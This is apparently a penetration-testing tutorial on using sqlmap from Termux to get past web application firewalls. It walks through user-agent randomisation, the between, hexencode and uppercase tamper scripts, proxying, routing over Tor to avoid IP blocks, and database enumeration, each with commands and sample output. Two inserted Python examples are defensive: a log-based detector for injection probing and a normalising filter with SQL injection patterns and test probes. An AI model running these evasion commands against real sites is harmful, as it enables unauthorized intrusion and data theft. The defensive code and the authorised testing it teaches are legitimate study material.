Bypassing Web Application Firewalls (WAF) Using SQLmap


Web Application Firewalls (WAF) play a critical role in blocking malicious traffic and protecting web applications from SQL injection attacks. However, WAFs aren't foolproof; understanding their limitations allows penetration testers to bypass them using advanced tools and techniques. SQLmap, a popular SQL injection tool, provides built-in features to evade WAF detection: payload obfuscation through tamper scripts, header modifications, and routing through proxies or the Tor network.

This article will demonstrate several methods for bypassing WAF using SQLmap with step-by-step examples, practical command outputs, and detailed explanations. Whether you’re conducting security assessments or expanding your ethical hacking skills, this guide will help you understand how to navigate WAF restrictions effectively.


Prerequisites

Before starting, make sure you have:

  • Termux installed.
  • SQLmap installed: run pkg install python, then pip install sqlmap.
  • A target web application: Ensure you have permission to test the system.
  • Proxy tool (e.g., Burp Suite): For analyzing blocked requests.
  • Optional: Tor Network: Configure Tor for anonymous SQLmap testing.

Bypassing WAF with SQLmap: Step-by-Step


Step 1: Initial SQL Injection Test

Begin by checking if the target is vulnerable to SQL injection.

Command:

sqlmap -u "http://target.com/page?id=1"

Sample Output:

[21:01:15] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS  
[21:01:15] [WARNING] WAF detected! Request blocked.  
[21:01:16] [ERROR] all tested parameters appear to be not injectable. 

Explanation:
This output shows that the request was blocked by the WAF. SQLmap's own check reports the target as protected, so the default payloads will not get through and you need the techniques in the following steps.


Step 2: Using SQLmap to Bypass WAF


1. Random User-Agent Header

Some WAFs block requests based on the User-Agent string. Use SQLmap’s --random-agent option to evade this.

Command:

sqlmap -u "http://target.com/page?id=1" --random-agent

Sample Output:

[21:05:23] [INFO] using a randomly selected HTTP User-Agent  
[21:05:24] [INFO] GET parameter 'id' appears to be injectable.  
[21:05:25] [INFO] available databases:
[*] target_db

Explanation:
Using a random User-Agent header tricked the WAF, allowing SQLmap to proceed with the injection.
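From the defender's side, the lesson of this step is that a rule keyed on the User-Agent header is trivial to sidestep. The following added example (written for this article, not part of the original post or of sqlmap) instead keys on request behaviour: it parses constructed Combined Log Format lines and flags a client that sends several distinct injection-looking values to the same parameter, regardless of what User-Agent it presents. The IPs, paths and log lines are constructed sample data.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (Combined Log Format), not from the page. One client
# probes the "id" parameter with several injection-looking values while
# presenting an ordinary browser User-Agent; the last line is normal traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:21:05:23 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/118.0"
203.0.113.7 - - [10/Oct/2024:21:05:23 +0000] "GET /page?id=1%27 HTTP/1.1" 500 128 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/118.0"
203.0.113.7 - - [10/Oct/2024:21:05:24 +0000] "GET /page?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/118.0"
203.0.113.7 - - [10/Oct/2024:21:05:24 +0000] "GET /page?id=1%20AND%201%3D2 HTTP/1.1" 200 17 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/118.0"
198.51.100.4 - - [10/Oct/2024:21:05:30 +0000] "GET /page?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0 (X11; Linux) Chrome/117.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Cheap marker for "this value looks like SQL rather than an id": quotes,
# parentheses, comment sequences or common keywords.
SUSPICIOUS = re.compile(r"['\"()]|--|\b(and|or|union|select|sleep)\b", re.IGNORECASE)


def find_probing(log_text: str, threshold: int = 3) -> dict:
    """Group requests by (client IP, path, parameter name) and report every
    parameter that received `threshold` or more distinct suspicious values.
    The User-Agent is recorded only for the report; it plays no part in the decision."""
    seen = defaultdict(dict)  # (ip, path, param) -> {decoded value: user agent}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            seen[(m.group("ip"), parts.path, name)][value] = m.group("ua")
    findings = {}
    for key, values in seen.items():
        hits = [v for v in values if SUSPICIOUS.search(v)]
        if len(hits) >= threshold:
            findings[key] = {"values": sorted(hits),
                             "user_agents": sorted(set(values.values()))}
    return findings


if __name__ == "__main__":
    for (ip, path, param), info in find_probing(SAMPLE_LOG).items():
        print(f"{ip} probed {path}?{param} with {len(info['values'])} SQL-like values; "
              f"UA(s): {info['user_agents']}")
```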


2. Tamper Scripts for Obfuscation

SQLmap offers tamper scripts that rewrite payloads to slip past WAF rules. For example, the between script replaces parts of the payload with equivalent constructs so that simple signature matches no longer fire.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=between

Sample Output:

[21:10:16] [INFO] GET parameter 'id' appears to be injectable.  
[21:10:17] [INFO] fetched data:  
Database: target_db  
[1 table found]  
+-------+  
| users |  
+-------+

Explanation:
The tamper script successfully encoded the payload, bypassing the WAF and retrieving data.


3. Hex Encoding Payloads

Hex encoding transforms SQL queries into hexadecimal format, confusing WAFs that don’t decode payloads.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=hexencode

Sample Output:

[21:15:43] [INFO] GET parameter 'id' appears to be injectable.  
Database: target_db  
[2 tables found]  
+---------+  
| users   |  
| orders  |  
+---------+

Explanation:
By sending hex-encoded payloads, SQLmap bypassed the WAF filters and extracted data from the database.


4. Case Manipulation to Evade WAF

Some WAFs rely on case-sensitive keyword detection. SQLmap offers case manipulation options through tamper scripts.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=uppercase

Sample Output:

[21:20:12] [INFO] found database: target_db

Explanation:
The WAF’s filtering rules didn’t account for case changes, allowing the payload to bypass detection.
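Sections 2 to 4 all exploit the same weakness: a filter that matches literal strings without first normalizing the input. The added example below (written for this article, not code from the original post or from sqlmap) puts a naive case-sensitive filter next to a hardened one that applies the transformations a WAF should run before matching: URL-decoding, hex-literal decoding, comment stripping, whitespace collapsing and lower-casing. The probe strings and the keyword patterns are constructed for the demonstration and are deliberately minimal.

```python
import re
from urllib.parse import unquote_plus


def naive_filter(value: str) -> bool:
    """Case-sensitive literal match: the rule style that case changes and
    hex encoding defeat, as the steps above show."""
    return any(kw in value for kw in ("union select", "' or ", "and 1=1"))


HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def _decode_hex(m: "re.Match") -> str:
    # Turn a MySQL-style 0x... literal back into text so encoded keywords
    # become visible; a malformed (odd-length) literal is left untouched.
    try:
        return bytes.fromhex(m.group(1)).decode("latin-1")
    except ValueError:
        return m.group(0)


def normalize(value: str) -> str:
    """ModSecurity-style transformations applied before pattern matching:
    URL-decode twice (double encoding), hex-decode, strip SQL inline
    comments, collapse whitespace, lower-case."""
    value = unquote_plus(unquote_plus(value))
    value = HEX_LITERAL.sub(_decode_hex, value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    value = re.sub(r"\s+", " ", value)
    return value.lower().strip()


# Constructed, intentionally small pattern set; a real rule set is larger.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b.*\bselect\b"),
    re.compile(r"\b(or|and)\b\s+\d+\s*=\s*\d+"),
    re.compile(r"'\s*(or|and)\b"),
    re.compile(r"\b(sleep|benchmark)\s*\("),
]


def hardened_filter(value: str) -> bool:
    """Match against the normalized value, so case changes and hex
    literals no longer hide the keywords from the patterns."""
    v = normalize(value)
    return any(p.search(v) for p in SQLI_PATTERNS)


if __name__ == "__main__":
    # Constructed probes: plain, upper-cased, hex-encoded, URL-encoded, benign.
    for probe in ("1 union select 1,2,3", "1 UNION SELECT 1,2,3",
                  "1 and 0x313d31", "1%27%20OR%201%3D1", "O'Reilly"):
        print(f"{probe!r:24} naive={naive_filter(probe)!s:5} hardened={hardened_filter(probe)}")
```

Running the block shows the naive filter passing the upper-cased and hex-encoded probes while the hardened one catches all four and still lets the benign value through.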


Step 3: SQLmap with Proxy Tools for WAF Analysis

Use a proxy such as Burp Suite to inspect blocked requests and adjust SQLmap payloads accordingly.

Command:

sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"

Sample Output:

[21:25:46] [INFO] routing traffic through http://127.0.0.1:8080  
[21:25:50] [INFO] GET parameter 'id' appears to be injectable.  

Explanation:
A proxy helps you analyze the WAF’s behavior and fine-tune your SQLmap commands for better evasion.


Step 4: Anonymizing SQLmap Requests with Tor

To avoid IP-based blocking by WAFs, route SQLmap traffic through the Tor network.

Command:

sqlmap -u "http://target.com/page?id=1" --tor --tor-type=SOCKS5 --check-tor

Sample Output:

[21:30:33] [INFO] Tor connection confirmed  
[21:30:35] [INFO] GET parameter 'id' appears to be injectable.  

Explanation:
Using Tor hides your real IP address and helps bypass IP-based WAF restrictions.


Step 5: Extracting Data After Bypassing WAF

Once the WAF is bypassed, you can extract data from the database using SQLmap.

Command:

sqlmap -u "http://target.com/page?id=1" --dbs

Sample Output:

[21:35:10] [INFO] available databases:  
[*] information_schema  
[*] target_db  

Conclusion

Bypassing WAFs with SQLmap requires strategic use of random agents, tamper scripts, and encoding techniques. Analyzing blocked requests through proxies and using Tor for anonymity further improves your chances of evading WAFs. Mastering these methods will enhance your penetration testing abilities, but always remember to use them responsibly and with authorization.


Disclaimer

This article is for educational purposes only. Unauthorized use of these techniques is illegal and can result in severe penalties. Always ensure that you have permission before testing any web application.
